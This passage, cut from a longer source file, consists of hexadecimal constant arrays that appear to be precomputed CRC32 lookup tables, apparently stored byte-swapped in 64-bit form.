0xd4ad14d400000000, 0x871bf9e100000000, 0x898b724400000000, 0xf8c33efe00000000, 0xf653b55b00000000, 0xa5e5586e00000000, 0xab75d3cb00000000, 0x0389830500000000, 0x0d1908a000000000, 0x5eafe59500000000, 0x503f6e3000000000, 0x4f5035d200000000, 0x41c0be7700000000, 0x1276534200000000, 0x1ce6d8e700000000, 0xb41a882900000000, 0xba8a038c00000000, 0xe93ceeb900000000, 0xe7ac651c00000000}, {0x0000000000000000, 0x97a61de700000000, 0x6f4b4a1500000000, 0xf8ed57f200000000, 0xde96942a00000000, 0x493089cd00000000, 0xb1ddde3f00000000, 0x267bc3d800000000, 
0xbc2d295500000000, 0x2b8b34b200000000, 0xd366634000000000, 0x44c07ea700000000, 0x62bbbd7f00000000, 0xf51da09800000000, 0x0df0f76a00000000, 0x9a56ea8d00000000, 0x785b52aa00000000, 0xeffd4f4d00000000, 0x171018bf00000000, 0x80b6055800000000, 0xa6cdc68000000000, 0x316bdb6700000000, 0xc9868c9500000000, 0x5e20917200000000, 0xc4767bff00000000, 0x53d0661800000000, 0xab3d31ea00000000, 0x3c9b2c0d00000000, 0x1ae0efd500000000, 0x8d46f23200000000, 0x75aba5c000000000, 0xe20db82700000000, 0xb1b0d58f00000000, 0x2616c86800000000, 0xdefb9f9a00000000, 0x495d827d00000000, 0x6f2641a500000000, 0xf8805c4200000000, 0x006d0bb000000000, 0x97cb165700000000, 0x0d9dfcda00000000, 0x9a3be13d00000000, 0x62d6b6cf00000000, 0xf570ab2800000000, 0xd30b68f000000000, 0x44ad751700000000, 0xbc4022e500000000, 0x2be63f0200000000, 0xc9eb872500000000, 0x5e4d9ac200000000, 0xa6a0cd3000000000, 0x3106d0d700000000, 0x177d130f00000000, 0x80db0ee800000000, 0x7836591a00000000, 0xef9044fd00000000, 0x75c6ae7000000000, 0xe260b39700000000, 0x1a8de46500000000, 0x8d2bf98200000000, 0xab503a5a00000000, 0x3cf627bd00000000, 0xc41b704f00000000, 0x53bd6da800000000, 0x2367dac400000000, 0xb4c1c72300000000, 0x4c2c90d100000000, 0xdb8a8d3600000000, 0xfdf14eee00000000, 0x6a57530900000000, 0x92ba04fb00000000, 0x051c191c00000000, 0x9f4af39100000000, 0x08ecee7600000000, 0xf001b98400000000, 0x67a7a46300000000, 0x41dc67bb00000000, 0xd67a7a5c00000000, 0x2e972dae00000000, 0xb931304900000000, 0x5b3c886e00000000, 0xcc9a958900000000, 0x3477c27b00000000, 0xa3d1df9c00000000, 0x85aa1c4400000000, 0x120c01a300000000, 0xeae1565100000000, 0x7d474bb600000000, 0xe711a13b00000000, 0x70b7bcdc00000000, 0x885aeb2e00000000, 0x1ffcf6c900000000, 0x3987351100000000, 0xae2128f600000000, 0x56cc7f0400000000, 0xc16a62e300000000, 0x92d70f4b00000000, 0x057112ac00000000, 0xfd9c455e00000000, 0x6a3a58b900000000, 0x4c419b6100000000, 0xdbe7868600000000, 0x230ad17400000000, 0xb4accc9300000000, 0x2efa261e00000000, 0xb95c3bf900000000, 0x41b16c0b00000000, 0xd61771ec00000000, 
0xf06cb23400000000, 0x67caafd300000000, 0x9f27f82100000000, 0x0881e5c600000000, 0xea8c5de100000000, 0x7d2a400600000000, 0x85c717f400000000, 0x12610a1300000000, 0x341ac9cb00000000, 0xa3bcd42c00000000, 0x5b5183de00000000, 0xccf79e3900000000, 0x56a174b400000000, 0xc107695300000000, 0x39ea3ea100000000, 0xae4c234600000000, 0x8837e09e00000000, 0x1f91fd7900000000, 0xe77caa8b00000000, 0x70dab76c00000000, 0x07c8c55200000000, 0x906ed8b500000000, 0x68838f4700000000, 0xff2592a000000000, 0xd95e517800000000, 0x4ef84c9f00000000, 0xb6151b6d00000000, 0x21b3068a00000000, 0xbbe5ec0700000000, 0x2c43f1e000000000, 0xd4aea61200000000, 0x4308bbf500000000, 0x6573782d00000000, 0xf2d565ca00000000, 0x0a38323800000000, 0x9d9e2fdf00000000, 0x7f9397f800000000, 0xe8358a1f00000000, 0x10d8dded00000000, 0x877ec00a00000000, 0xa10503d200000000, 0x36a31e3500000000, 0xce4e49c700000000, 0x59e8542000000000, 0xc3bebead00000000, 0x5418a34a00000000, 0xacf5f4b800000000, 0x3b53e95f00000000, 0x1d282a8700000000, 0x8a8e376000000000, 0x7263609200000000, 0xe5c57d7500000000, 0xb67810dd00000000, 0x21de0d3a00000000, 0xd9335ac800000000, 0x4e95472f00000000, 0x68ee84f700000000, 0xff48991000000000, 0x07a5cee200000000, 0x9003d30500000000, 0x0a55398800000000, 0x9df3246f00000000, 0x651e739d00000000, 0xf2b86e7a00000000, 0xd4c3ada200000000, 0x4365b04500000000, 0xbb88e7b700000000, 0x2c2efa5000000000, 0xce23427700000000, 0x59855f9000000000, 0xa168086200000000, 0x36ce158500000000, 0x10b5d65d00000000, 0x8713cbba00000000, 0x7ffe9c4800000000, 0xe85881af00000000, 0x720e6b2200000000, 0xe5a876c500000000, 0x1d45213700000000, 0x8ae33cd000000000, 0xac98ff0800000000, 0x3b3ee2ef00000000, 0xc3d3b51d00000000, 0x5475a8fa00000000, 0x24af1f9600000000, 0xb309027100000000, 0x4be4558300000000, 0xdc42486400000000, 0xfa398bbc00000000, 0x6d9f965b00000000, 0x9572c1a900000000, 0x02d4dc4e00000000, 0x988236c300000000, 0x0f242b2400000000, 0xf7c97cd600000000, 0x606f613100000000, 0x4614a2e900000000, 0xd1b2bf0e00000000, 0x295fe8fc00000000, 0xbef9f51b00000000, 
0x5cf44d3c00000000, 0xcb5250db00000000, 0x33bf072900000000, 0xa4191ace00000000, 0x8262d91600000000, 0x15c4c4f100000000, 0xed29930300000000, 0x7a8f8ee400000000, 0xe0d9646900000000, 0x777f798e00000000, 0x8f922e7c00000000, 0x1834339b00000000, 0x3e4ff04300000000, 0xa9e9eda400000000, 0x5104ba5600000000, 0xc6a2a7b100000000, 0x951fca1900000000, 0x02b9d7fe00000000, 0xfa54800c00000000, 0x6df29deb00000000, 0x4b895e3300000000, 0xdc2f43d400000000, 0x24c2142600000000, 0xb36409c100000000, 0x2932e34c00000000, 0xbe94feab00000000, 0x4679a95900000000, 0xd1dfb4be00000000, 0xf7a4776600000000, 0x60026a8100000000, 0x98ef3d7300000000, 0x0f49209400000000, 0xed4498b300000000, 0x7ae2855400000000, 0x820fd2a600000000, 0x15a9cf4100000000, 0x33d20c9900000000, 0xa474117e00000000, 0x5c99468c00000000, 0xcb3f5b6b00000000, 0x5169b1e600000000, 0xc6cfac0100000000, 0x3e22fbf300000000, 0xa984e61400000000, 0x8fff25cc00000000, 0x1859382b00000000, 0xe0b46fd900000000, 0x7712723e00000000}, {0x0000000000000000, 0x411b8c6e00000000, 0x823618dd00000000, 0xc32d94b300000000, 0x456b416100000000, 0x0470cd0f00000000, 0xc75d59bc00000000, 0x8646d5d200000000, 0x8ad682c200000000, 0xcbcd0eac00000000, 0x08e09a1f00000000, 0x49fb167100000000, 0xcfbdc3a300000000, 0x8ea64fcd00000000, 0x4d8bdb7e00000000, 0x0c90571000000000, 0x55ab745e00000000, 0x14b0f83000000000, 0xd79d6c8300000000, 0x9686e0ed00000000, 0x10c0353f00000000, 0x51dbb95100000000, 0x92f62de200000000, 0xd3eda18c00000000, 0xdf7df69c00000000, 0x9e667af200000000, 0x5d4bee4100000000, 0x1c50622f00000000, 0x9a16b7fd00000000, 0xdb0d3b9300000000, 0x1820af2000000000, 0x593b234e00000000, 0xaa56e9bc00000000, 0xeb4d65d200000000, 0x2860f16100000000, 0x697b7d0f00000000, 0xef3da8dd00000000, 0xae2624b300000000, 0x6d0bb00000000000, 0x2c103c6e00000000, 0x20806b7e00000000, 0x619be71000000000, 0xa2b673a300000000, 0xe3adffcd00000000, 0x65eb2a1f00000000, 0x24f0a67100000000, 0xe7dd32c200000000, 0xa6c6beac00000000, 0xfffd9de200000000, 0xbee6118c00000000, 0x7dcb853f00000000, 
0x3cd0095100000000, 0xba96dc8300000000, 0xfb8d50ed00000000, 0x38a0c45e00000000, 0x79bb483000000000, 0x752b1f2000000000, 0x3430934e00000000, 0xf71d07fd00000000, 0xb6068b9300000000, 0x30405e4100000000, 0x715bd22f00000000, 0xb276469c00000000, 0xf36dcaf200000000, 0x15aba3a200000000, 0x54b02fcc00000000, 0x979dbb7f00000000, 0xd686371100000000, 0x50c0e2c300000000, 0x11db6ead00000000, 0xd2f6fa1e00000000, 0x93ed767000000000, 0x9f7d216000000000, 0xde66ad0e00000000, 0x1d4b39bd00000000, 0x5c50b5d300000000, 0xda16600100000000, 0x9b0dec6f00000000, 0x582078dc00000000, 0x193bf4b200000000, 0x4000d7fc00000000, 0x011b5b9200000000, 0xc236cf2100000000, 0x832d434f00000000, 0x056b969d00000000, 0x44701af300000000, 0x875d8e4000000000, 0xc646022e00000000, 0xcad6553e00000000, 0x8bcdd95000000000, 0x48e04de300000000, 0x09fbc18d00000000, 0x8fbd145f00000000, 0xcea6983100000000, 0x0d8b0c8200000000, 0x4c9080ec00000000, 0xbffd4a1e00000000, 0xfee6c67000000000, 0x3dcb52c300000000, 0x7cd0dead00000000, 0xfa960b7f00000000, 0xbb8d871100000000, 0x78a013a200000000, 0x39bb9fcc00000000, 0x352bc8dc00000000, 0x743044b200000000, 0xb71dd00100000000, 0xf6065c6f00000000, 0x704089bd00000000, 0x315b05d300000000, 0xf276916000000000, 0xb36d1d0e00000000, 0xea563e4000000000, 0xab4db22e00000000, 0x6860269d00000000, 0x297baaf300000000, 0xaf3d7f2100000000, 0xee26f34f00000000, 0x2d0b67fc00000000, 0x6c10eb9200000000, 0x6080bc8200000000, 0x219b30ec00000000, 0xe2b6a45f00000000, 0xa3ad283100000000, 0x25ebfde300000000, 0x64f0718d00000000, 0xa7dde53e00000000, 0xe6c6695000000000, 0x6b50369e00000000, 0x2a4bbaf000000000, 0xe9662e4300000000, 0xa87da22d00000000, 0x2e3b77ff00000000, 0x6f20fb9100000000, 0xac0d6f2200000000, 0xed16e34c00000000, 0xe186b45c00000000, 0xa09d383200000000, 0x63b0ac8100000000, 0x22ab20ef00000000, 0xa4edf53d00000000, 0xe5f6795300000000, 0x26dbede000000000, 0x67c0618e00000000, 0x3efb42c000000000, 0x7fe0ceae00000000, 0xbccd5a1d00000000, 0xfdd6d67300000000, 0x7b9003a100000000, 0x3a8b8fcf00000000, 0xf9a61b7c00000000, 
0xb8bd971200000000, 0xb42dc00200000000, 0xf5364c6c00000000, 0x361bd8df00000000, 0x770054b100000000, 0xf146816300000000, 0xb05d0d0d00000000, 0x737099be00000000, 0x326b15d000000000, 0xc106df2200000000, 0x801d534c00000000, 0x4330c7ff00000000, 0x022b4b9100000000, 0x846d9e4300000000, 0xc576122d00000000, 0x065b869e00000000, 0x47400af000000000, 0x4bd05de000000000, 0x0acbd18e00000000, 0xc9e6453d00000000, 0x88fdc95300000000, 0x0ebb1c8100000000, 0x4fa090ef00000000, 0x8c8d045c00000000, 0xcd96883200000000, 0x94adab7c00000000, 0xd5b6271200000000, 0x169bb3a100000000, 0x57803fcf00000000, 0xd1c6ea1d00000000, 0x90dd667300000000, 0x53f0f2c000000000, 0x12eb7eae00000000, 0x1e7b29be00000000, 0x5f60a5d000000000, 0x9c4d316300000000, 0xdd56bd0d00000000, 0x5b1068df00000000, 0x1a0be4b100000000, 0xd926700200000000, 0x983dfc6c00000000, 0x7efb953c00000000, 0x3fe0195200000000, 0xfccd8de100000000, 0xbdd6018f00000000, 0x3b90d45d00000000, 0x7a8b583300000000, 0xb9a6cc8000000000, 0xf8bd40ee00000000, 0xf42d17fe00000000, 0xb5369b9000000000, 0x761b0f2300000000, 0x3700834d00000000, 0xb146569f00000000, 0xf05ddaf100000000, 0x33704e4200000000, 0x726bc22c00000000, 0x2b50e16200000000, 0x6a4b6d0c00000000, 0xa966f9bf00000000, 0xe87d75d100000000, 0x6e3ba00300000000, 0x2f202c6d00000000, 0xec0db8de00000000, 0xad1634b000000000, 0xa18663a000000000, 0xe09defce00000000, 0x23b07b7d00000000, 0x62abf71300000000, 0xe4ed22c100000000, 0xa5f6aeaf00000000, 0x66db3a1c00000000, 0x27c0b67200000000, 0xd4ad7c8000000000, 0x95b6f0ee00000000, 0x569b645d00000000, 0x1780e83300000000, 0x91c63de100000000, 0xd0ddb18f00000000, 0x13f0253c00000000, 0x52eba95200000000, 0x5e7bfe4200000000, 0x1f60722c00000000, 0xdc4de69f00000000, 0x9d566af100000000, 0x1b10bf2300000000, 0x5a0b334d00000000, 0x9926a7fe00000000, 0xd83d2b9000000000, 0x810608de00000000, 0xc01d84b000000000, 0x0330100300000000, 0x422b9c6d00000000, 0xc46d49bf00000000, 0x8576c5d100000000, 0x465b516200000000, 0x0740dd0c00000000, 0x0bd08a1c00000000, 0x4acb067200000000, 0x89e692c100000000, 
0xc8fd1eaf00000000, 0x4ebbcb7d00000000, 0x0fa0471300000000, 0xcc8dd3a000000000, 0x8d965fce00000000}, {0x0000000000000000, 0x1dfdb50100000000, 0x3afa6b0300000000, 0x2707de0200000000, 0x74f4d70600000000, 0x6909620700000000, 0x4e0ebc0500000000, 0x53f3090400000000, 0xe8e8af0d00000000, 0xf5151a0c00000000, 0xd212c40e00000000, 0xcfef710f00000000, 0x9c1c780b00000000, 0x81e1cd0a00000000, 0xa6e6130800000000, 0xbb1ba60900000000, 0xd0d15f1b00000000, 0xcd2cea1a00000000, 0xea2b341800000000, 0xf7d6811900000000, 0xa425881d00000000, 0xb9d83d1c00000000, 0x9edfe31e00000000, 0x8322561f00000000, 0x3839f01600000000, 0x25c4451700000000, 0x02c39b1500000000, 0x1f3e2e1400000000, 0x4ccd271000000000, 0x5130921100000000, 0x76374c1300000000, 0x6bcaf91200000000, 0xa0a3bf3600000000, 0xbd5e0a3700000000, 0x9a59d43500000000, 0x87a4613400000000, 0xd457683000000000, 0xc9aadd3100000000, 0xeead033300000000, 0xf350b63200000000, 0x484b103b00000000, 0x55b6a53a00000000, 0x72b17b3800000000, 0x6f4cce3900000000, 0x3cbfc73d00000000, 0x2142723c00000000, 0x0645ac3e00000000, 0x1bb8193f00000000, 0x7072e02d00000000, 0x6d8f552c00000000, 0x4a888b2e00000000, 0x57753e2f00000000, 0x0486372b00000000, 0x197b822a00000000, 0x3e7c5c2800000000, 0x2381e92900000000, 0x989a4f2000000000, 0x8567fa2100000000, 0xa260242300000000, 0xbf9d912200000000, 0xec6e982600000000, 0xf1932d2700000000, 0xd694f32500000000, 0xcb69462400000000, 0x40477f6d00000000, 0x5dbaca6c00000000, 0x7abd146e00000000, 0x6740a16f00000000, 0x34b3a86b00000000, 0x294e1d6a00000000, 0x0e49c36800000000, 0x13b4766900000000, 0xa8afd06000000000, 0xb552656100000000, 0x9255bb6300000000, 0x8fa80e6200000000, 0xdc5b076600000000, 0xc1a6b26700000000, 0xe6a16c6500000000, 0xfb5cd96400000000, 0x9096207600000000, 0x8d6b957700000000, 0xaa6c4b7500000000, 0xb791fe7400000000, 0xe462f77000000000, 0xf99f427100000000, 0xde989c7300000000, 0xc365297200000000, 0x787e8f7b00000000, 0x65833a7a00000000, 0x4284e47800000000, 0x5f79517900000000, 0x0c8a587d00000000, 0x1177ed7c00000000, 
0x3670337e00000000, 0x2b8d867f00000000, 0xe0e4c05b00000000, 0xfd19755a00000000, 0xda1eab5800000000, 0xc7e31e5900000000, 0x9410175d00000000, 0x89eda25c00000000, 0xaeea7c5e00000000, 0xb317c95f00000000, 0x080c6f5600000000, 0x15f1da5700000000, 0x32f6045500000000, 0x2f0bb15400000000, 0x7cf8b85000000000, 0x61050d5100000000, 0x4602d35300000000, 0x5bff665200000000, 0x30359f4000000000, 0x2dc82a4100000000, 0x0acff44300000000, 0x1732414200000000, 0x44c1484600000000, 0x593cfd4700000000, 0x7e3b234500000000, 0x63c6964400000000, 0xd8dd304d00000000, 0xc520854c00000000, 0xe2275b4e00000000, 0xffdaee4f00000000, 0xac29e74b00000000, 0xb1d4524a00000000, 0x96d38c4800000000, 0x8b2e394900000000, 0x808efeda00000000, 0x9d734bdb00000000, 0xba7495d900000000, 0xa78920d800000000, 0xf47a29dc00000000, 0xe9879cdd00000000, 0xce8042df00000000, 0xd37df7de00000000, 0x686651d700000000, 0x759be4d600000000, 0x529c3ad400000000, 0x4f618fd500000000, 0x1c9286d100000000, 0x016f33d000000000, 0x2668edd200000000, 0x3b9558d300000000, 0x505fa1c100000000, 0x4da214c000000000, 0x6aa5cac200000000, 0x77587fc300000000, 0x24ab76c700000000, 0x3956c3c600000000, 0x1e511dc400000000, 0x03aca8c500000000, 0xb8b70ecc00000000, 0xa54abbcd00000000, 0x824d65cf00000000, 0x9fb0d0ce00000000, 0xcc43d9ca00000000, 0xd1be6ccb00000000, 0xf6b9b2c900000000, 0xeb4407c800000000, 0x202d41ec00000000, 0x3dd0f4ed00000000, 0x1ad72aef00000000, 0x072a9fee00000000, 0x54d996ea00000000, 0x492423eb00000000, 0x6e23fde900000000, 0x73de48e800000000, 0xc8c5eee100000000, 0xd5385be000000000, 0xf23f85e200000000, 0xefc230e300000000, 0xbc3139e700000000, 0xa1cc8ce600000000, 0x86cb52e400000000, 0x9b36e7e500000000, 0xf0fc1ef700000000, 0xed01abf600000000, 0xca0675f400000000, 0xd7fbc0f500000000, 0x8408c9f100000000, 0x99f57cf000000000, 0xbef2a2f200000000, 0xa30f17f300000000, 0x1814b1fa00000000, 0x05e904fb00000000, 0x22eedaf900000000, 0x3f136ff800000000, 0x6ce066fc00000000, 0x711dd3fd00000000, 0x561a0dff00000000, 0x4be7b8fe00000000, 0xc0c981b700000000, 0xdd3434b600000000, 
0xfa33eab400000000, 0xe7ce5fb500000000, 0xb43d56b100000000, 0xa9c0e3b000000000, 0x8ec73db200000000, 0x933a88b300000000, 0x28212eba00000000, 0x35dc9bbb00000000, 0x12db45b900000000, 0x0f26f0b800000000, 0x5cd5f9bc00000000, 0x41284cbd00000000, 0x662f92bf00000000, 0x7bd227be00000000, 0x1018deac00000000, 0x0de56bad00000000, 0x2ae2b5af00000000, 0x371f00ae00000000, 0x64ec09aa00000000, 0x7911bcab00000000, 0x5e1662a900000000, 0x43ebd7a800000000, 0xf8f071a100000000, 0xe50dc4a000000000, 0xc20a1aa200000000, 0xdff7afa300000000, 0x8c04a6a700000000, 0x91f913a600000000, 0xb6fecda400000000, 0xab0378a500000000, 0x606a3e8100000000, 0x7d978b8000000000, 0x5a90558200000000, 0x476de08300000000, 0x149ee98700000000, 0x09635c8600000000, 0x2e64828400000000, 0x3399378500000000, 0x8882918c00000000, 0x957f248d00000000, 0xb278fa8f00000000, 0xaf854f8e00000000, 0xfc76468a00000000, 0xe18bf38b00000000, 0xc68c2d8900000000, 0xdb71988800000000, 0xb0bb619a00000000, 0xad46d49b00000000, 0x8a410a9900000000, 0x97bcbf9800000000, 0xc44fb69c00000000, 0xd9b2039d00000000, 0xfeb5dd9f00000000, 0xe348689e00000000, 0x5853ce9700000000, 0x45ae7b9600000000, 0x62a9a59400000000, 0x7f54109500000000, 0x2ca7199100000000, 0x315aac9000000000, 0x165d729200000000, 0x0ba0c79300000000}, {0x0000000000000000, 0x24d9076300000000, 0x48b20fc600000000, 0x6c6b08a500000000, 0xd1626e5700000000, 0xf5bb693400000000, 0x99d0619100000000, 0xbd0966f200000000, 0xa2c5dcae00000000, 0x861cdbcd00000000, 0xea77d36800000000, 0xceaed40b00000000, 0x73a7b2f900000000, 0x577eb59a00000000, 0x3b15bd3f00000000, 0x1fccba5c00000000, 0x058dc88600000000, 0x2154cfe500000000, 0x4d3fc74000000000, 0x69e6c02300000000, 0xd4efa6d100000000, 0xf036a1b200000000, 0x9c5da91700000000, 0xb884ae7400000000, 0xa748142800000000, 0x8391134b00000000, 0xeffa1bee00000000, 0xcb231c8d00000000, 0x762a7a7f00000000, 0x52f37d1c00000000, 0x3e9875b900000000, 0x1a4172da00000000, 0x4b1ce0d600000000, 0x6fc5e7b500000000, 0x03aeef1000000000, 0x2777e87300000000, 0x9a7e8e8100000000, 
0xbea789e200000000, 0xd2cc814700000000, 0xf615862400000000, 0xe9d93c7800000000, 0xcd003b1b00000000, 0xa16b33be00000000, 0x85b234dd00000000, 0x38bb522f00000000, 0x1c62554c00000000, 0x70095de900000000, 0x54d05a8a00000000, 0x4e91285000000000, 0x6a482f3300000000, 0x0623279600000000, 0x22fa20f500000000, 0x9ff3460700000000, 0xbb2a416400000000, 0xd74149c100000000, 0xf3984ea200000000, 0xec54f4fe00000000, 0xc88df39d00000000, 0xa4e6fb3800000000, 0x803ffc5b00000000, 0x3d369aa900000000, 0x19ef9dca00000000, 0x7584956f00000000, 0x515d920c00000000, 0xd73eb17600000000, 0xf3e7b61500000000, 0x9f8cbeb000000000, 0xbb55b9d300000000, 0x065cdf2100000000, 0x2285d84200000000, 0x4eeed0e700000000, 0x6a37d78400000000, 0x75fb6dd800000000, 0x51226abb00000000, 0x3d49621e00000000, 0x1990657d00000000, 0xa499038f00000000, 0x804004ec00000000, 0xec2b0c4900000000, 0xc8f20b2a00000000, 0xd2b379f000000000, 0xf66a7e9300000000, 0x9a01763600000000, 0xbed8715500000000, 0x03d117a700000000, 0x270810c400000000, 0x4b63186100000000, 0x6fba1f0200000000, 0x7076a55e00000000, 0x54afa23d00000000, 0x38c4aa9800000000, 0x1c1dadfb00000000, 0xa114cb0900000000, 0x85cdcc6a00000000, 0xe9a6c4cf00000000, 0xcd7fc3ac00000000, 0x9c2251a000000000, 0xb8fb56c300000000, 0xd4905e6600000000, 0xf049590500000000, 0x4d403ff700000000, 0x6999389400000000, 0x05f2303100000000, 0x212b375200000000, 0x3ee78d0e00000000, 0x1a3e8a6d00000000, 0x765582c800000000, 0x528c85ab00000000, 0xef85e35900000000, 0xcb5ce43a00000000, 0xa737ec9f00000000, 0x83eeebfc00000000, 0x99af992600000000, 0xbd769e4500000000, 0xd11d96e000000000, 0xf5c4918300000000, 0x48cdf77100000000, 0x6c14f01200000000, 0x007ff8b700000000, 0x24a6ffd400000000, 0x3b6a458800000000, 0x1fb342eb00000000, 0x73d84a4e00000000, 0x57014d2d00000000, 0xea082bdf00000000, 0xced12cbc00000000, 0xa2ba241900000000, 0x8663237a00000000, 0xae7d62ed00000000, 0x8aa4658e00000000, 0xe6cf6d2b00000000, 0xc2166a4800000000, 0x7f1f0cba00000000, 0x5bc60bd900000000, 0x37ad037c00000000, 0x1374041f00000000, 0x0cb8be4300000000, 
0x2861b92000000000, 0x440ab18500000000, 0x60d3b6e600000000, 0xdddad01400000000, 0xf903d77700000000, 0x9568dfd200000000, 0xb1b1d8b100000000, 0xabf0aa6b00000000, 0x8f29ad0800000000, 0xe342a5ad00000000, 0xc79ba2ce00000000, 0x7a92c43c00000000, 0x5e4bc35f00000000, 0x3220cbfa00000000, 0x16f9cc9900000000, 0x093576c500000000, 0x2dec71a600000000, 0x4187790300000000, 0x655e7e6000000000, 0xd857189200000000, 0xfc8e1ff100000000, 0x90e5175400000000, 0xb43c103700000000, 0xe561823b00000000, 0xc1b8855800000000, 0xadd38dfd00000000, 0x890a8a9e00000000, 0x3403ec6c00000000, 0x10daeb0f00000000, 0x7cb1e3aa00000000, 0x5868e4c900000000, 0x47a45e9500000000, 0x637d59f600000000, 0x0f16515300000000, 0x2bcf563000000000, 0x96c630c200000000, 0xb21f37a100000000, 0xde743f0400000000, 0xfaad386700000000, 0xe0ec4abd00000000, 0xc4354dde00000000, 0xa85e457b00000000, 0x8c87421800000000, 0x318e24ea00000000, 0x1557238900000000, 0x793c2b2c00000000, 0x5de52c4f00000000, 0x4229961300000000, 0x66f0917000000000, 0x0a9b99d500000000, 0x2e429eb600000000, 0x934bf84400000000, 0xb792ff2700000000, 0xdbf9f78200000000, 0xff20f0e100000000, 0x7943d39b00000000, 0x5d9ad4f800000000, 0x31f1dc5d00000000, 0x1528db3e00000000, 0xa821bdcc00000000, 0x8cf8baaf00000000, 0xe093b20a00000000, 0xc44ab56900000000, 0xdb860f3500000000, 0xff5f085600000000, 0x933400f300000000, 0xb7ed079000000000, 0x0ae4616200000000, 0x2e3d660100000000, 0x42566ea400000000, 0x668f69c700000000, 0x7cce1b1d00000000, 0x58171c7e00000000, 0x347c14db00000000, 0x10a513b800000000, 0xadac754a00000000, 0x8975722900000000, 0xe51e7a8c00000000, 0xc1c77def00000000, 0xde0bc7b300000000, 0xfad2c0d000000000, 0x96b9c87500000000, 0xb260cf1600000000, 0x0f69a9e400000000, 0x2bb0ae8700000000, 0x47dba62200000000, 0x6302a14100000000, 0x325f334d00000000, 0x1686342e00000000, 0x7aed3c8b00000000, 0x5e343be800000000, 0xe33d5d1a00000000, 0xc7e45a7900000000, 0xab8f52dc00000000, 0x8f5655bf00000000, 0x909aefe300000000, 0xb443e88000000000, 0xd828e02500000000, 0xfcf1e74600000000, 0x41f881b400000000, 
0x652186d700000000, 0x094a8e7200000000, 0x2d93891100000000, 0x37d2fbcb00000000, 0x130bfca800000000, 0x7f60f40d00000000, 0x5bb9f36e00000000, 0xe6b0959c00000000, 0xc26992ff00000000, 0xae029a5a00000000, 0x8adb9d3900000000, 0x9517276500000000, 0xb1ce200600000000, 0xdda528a300000000, 0xf97c2fc000000000, 0x4475493200000000, 0x60ac4e5100000000, 0x0cc746f400000000, 0x281e419700000000}, {0x0000000000000000, 0x08e3603c00000000, 0x10c6c17800000000, 0x1825a14400000000, 0x208c83f100000000, 0x286fe3cd00000000, 0x304a428900000000, 0x38a922b500000000, 0x011e763800000000, 0x09fd160400000000, 0x11d8b74000000000, 0x193bd77c00000000, 0x2192f5c900000000, 0x297195f500000000, 0x315434b100000000, 0x39b7548d00000000, 0x023cec7000000000, 0x0adf8c4c00000000, 0x12fa2d0800000000, 0x1a194d3400000000, 0x22b06f8100000000, 0x2a530fbd00000000, 0x3276aef900000000, 0x3a95cec500000000, 0x03229a4800000000, 0x0bc1fa7400000000, 0x13e45b3000000000, 0x1b073b0c00000000, 0x23ae19b900000000, 0x2b4d798500000000, 0x3368d8c100000000, 0x3b8bb8fd00000000, 0x0478d8e100000000, 0x0c9bb8dd00000000, 0x14be199900000000, 0x1c5d79a500000000, 0x24f45b1000000000, 0x2c173b2c00000000, 0x34329a6800000000, 0x3cd1fa5400000000, 0x0566aed900000000, 0x0d85cee500000000, 0x15a06fa100000000, 0x1d430f9d00000000, 0x25ea2d2800000000, 0x2d094d1400000000, 0x352cec5000000000, 0x3dcf8c6c00000000, 0x0644349100000000, 0x0ea754ad00000000, 0x1682f5e900000000, 0x1e6195d500000000, 0x26c8b76000000000, 0x2e2bd75c00000000, 0x360e761800000000, 0x3eed162400000000, 0x075a42a900000000, 0x0fb9229500000000, 0x179c83d100000000, 0x1f7fe3ed00000000, 0x27d6c15800000000, 0x2f35a16400000000, 0x3710002000000000, 0x3ff3601c00000000, 0x49f6c11800000000, 0x4115a12400000000, 0x5930006000000000, 0x51d3605c00000000, 0x697a42e900000000, 0x619922d500000000, 0x79bc839100000000, 0x715fe3ad00000000, 0x48e8b72000000000, 0x400bd71c00000000, 0x582e765800000000, 0x50cd166400000000, 0x686434d100000000, 0x608754ed00000000, 0x78a2f5a900000000, 0x7041959500000000, 
0x4bca2d6800000000, 0x43294d5400000000, 0x5b0cec1000000000, 0x53ef8c2c00000000, 0x6b46ae9900000000, 0x63a5cea500000000, 0x7b806fe100000000, 0x73630fdd00000000, 0x4ad45b5000000000, 0x42373b6c00000000, 0x5a129a2800000000, 0x52f1fa1400000000, 0x6a58d8a100000000, 0x62bbb89d00000000, 0x7a9e19d900000000, 0x727d79e500000000, 0x4d8e19f900000000, 0x456d79c500000000, 0x5d48d88100000000, 0x55abb8bd00000000, 0x6d029a0800000000, 0x65e1fa3400000000, 0x7dc45b7000000000, 0x75273b4c00000000, 0x4c906fc100000000, 0x44730ffd00000000, 0x5c56aeb900000000, 0x54b5ce8500000000, 0x6c1cec3000000000, 0x64ff8c0c00000000, 0x7cda2d4800000000, 0x74394d7400000000, 0x4fb2f58900000000, 0x475195b500000000, 0x5f7434f100000000, 0x579754cd00000000, 0x6f3e767800000000, 0x67dd164400000000, 0x7ff8b70000000000, 0x771bd73c00000000, 0x4eac83b100000000, 0x464fe38d00000000, 0x5e6a42c900000000, 0x568922f500000000, 0x6e20004000000000, 0x66c3607c00000000, 0x7ee6c13800000000, 0x7605a10400000000, 0x92ec833100000000, 0x9a0fe30d00000000, 0x822a424900000000, 0x8ac9227500000000, 0xb26000c000000000, 0xba8360fc00000000, 0xa2a6c1b800000000, 0xaa45a18400000000, 0x93f2f50900000000, 0x9b11953500000000, 0x8334347100000000, 0x8bd7544d00000000, 0xb37e76f800000000, 0xbb9d16c400000000, 0xa3b8b78000000000, 0xab5bd7bc00000000, 0x90d06f4100000000, 0x98330f7d00000000, 0x8016ae3900000000, 0x88f5ce0500000000, 0xb05cecb000000000, 0xb8bf8c8c00000000, 0xa09a2dc800000000, 0xa8794df400000000, 0x91ce197900000000, 0x992d794500000000, 0x8108d80100000000, 0x89ebb83d00000000, 0xb1429a8800000000, 0xb9a1fab400000000, 0xa1845bf000000000, 0xa9673bcc00000000, 0x96945bd000000000, 0x9e773bec00000000, 0x86529aa800000000, 0x8eb1fa9400000000, 0xb618d82100000000, 0xbefbb81d00000000, 0xa6de195900000000, 0xae3d796500000000, 0x978a2de800000000, 0x9f694dd400000000, 0x874cec9000000000, 0x8faf8cac00000000, 0xb706ae1900000000, 0xbfe5ce2500000000, 0xa7c06f6100000000, 0xaf230f5d00000000, 0x94a8b7a000000000, 0x9c4bd79c00000000, 0x846e76d800000000, 0x8c8d16e400000000, 
